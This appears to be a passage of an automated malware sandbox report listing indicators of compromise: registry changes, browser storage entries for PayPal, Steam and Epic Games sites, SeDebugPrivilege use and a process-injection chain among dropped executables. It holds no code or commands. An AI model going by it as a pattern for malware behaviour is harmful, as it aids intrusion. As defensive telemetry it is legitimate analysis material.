Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1911 = "Russia TZ 10 Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	Conhost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	Conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-661 = "Cen. Australia Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-682 = "E. Australia Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	Conhost.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 01bb970dfd0ada01	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\store.steampowered.com	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\Certificates	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\paypal.com	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.paypalobjects.com\ = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = d49c3840fd0ada01	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 4e1a510cfd0ada01	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\recaptcha.net	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\ProcessingFlag = 7034bf3ffd0ada01	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\recaptcha.net\Total = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\hcaptcha.com\ = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "165"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.paypal.com\ = "16"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\""	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "15"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\NextUpdateDate = "405413470"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DomStorageState	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\www.paypal.com	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.recaptcha.net\ = "103"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\epicgames.com\Total = "0"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DomStorageState	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\epicgames.com\ = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\paypal.com\Total = "62"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer\Main\OperationalData = "1"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\paypal.com\Total = "0"	MicrosoftEdgeCP.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4440	3by11ax.exe
4440	3by11ax.exe
5044	AppLaunch.exe
5044	AppLaunch.exe
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3396	Explorer.EXE

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
644	Process not Found

Suspicious behavior: MapViewOfSection 44 IoCs

pid	Process
4440	3by11ax.exe
4732	MicrosoftEdgeCP.exe
4732	MicrosoftEdgeCP.exe
4732	MicrosoftEdgeCP.exe
4732	MicrosoftEdgeCP.exe
4732	MicrosoftEdgeCP.exe
4732	MicrosoftEdgeCP.exe
4732	MicrosoftEdgeCP.exe
4732	MicrosoftEdgeCP.exe
4732	MicrosoftEdgeCP.exe
4732	MicrosoftEdgeCP.exe
4732	MicrosoftEdgeCP.exe
6100	toolspub2.exe
4732	MicrosoftEdgeCP.exe
4732	MicrosoftEdgeCP.exe
4732	MicrosoftEdgeCP.exe
4732	MicrosoftEdgeCP.exe
4732	MicrosoftEdgeCP.exe
4732	MicrosoftEdgeCP.exe
4732	MicrosoftEdgeCP.exe
4732	MicrosoftEdgeCP.exe
4732	MicrosoftEdgeCP.exe
4732	MicrosoftEdgeCP.exe
4732	MicrosoftEdgeCP.exe
4732	MicrosoftEdgeCP.exe
4732	MicrosoftEdgeCP.exe
4732	MicrosoftEdgeCP.exe
4732	MicrosoftEdgeCP.exe
4732	MicrosoftEdgeCP.exe
4732	MicrosoftEdgeCP.exe
4732	MicrosoftEdgeCP.exe
4732	MicrosoftEdgeCP.exe
4732	MicrosoftEdgeCP.exe
4732	MicrosoftEdgeCP.exe
4732	MicrosoftEdgeCP.exe
4732	MicrosoftEdgeCP.exe
4732	MicrosoftEdgeCP.exe
4732	MicrosoftEdgeCP.exe
4732	MicrosoftEdgeCP.exe
4732	MicrosoftEdgeCP.exe
4732	MicrosoftEdgeCP.exe
4732	MicrosoftEdgeCP.exe
4732	MicrosoftEdgeCP.exe
4364	gwdrejs

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5044	AppLaunch.exe
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeDebugPrivilege	164	FE88.exe
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeDebugPrivilege	4472	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4472	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4472	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4472	MicrosoftEdgeCP.exe
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeDebugPrivilege	6052	kos4.exe
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeDebugPrivilege	6784	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	6784	MicrosoftEdgeCP.exe
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeDebugPrivilege	928	powershell.exe
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
5944	LzmwAqmV.tmp

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
4840	MicrosoftEdge.exe
4732	MicrosoftEdgeCP.exe
4472	MicrosoftEdgeCP.exe
4732	MicrosoftEdgeCP.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4444 wrote to memory of 4288	4444	ch0Lw56.exe	71
PID 4444 wrote to memory of 4288	4444	ch0Lw56.exe	71
PID 4444 wrote to memory of 4288	4444	ch0Lw56.exe	71
PID 4288 wrote to memory of 4756	4288	oi8IN07.exe	72
PID 4288 wrote to memory of 4756	4288	oi8IN07.exe	72
PID 4288 wrote to memory of 4756	4288	oi8IN07.exe	72
PID 4756 wrote to memory of 5044	4756	1bU20VP8.exe	73
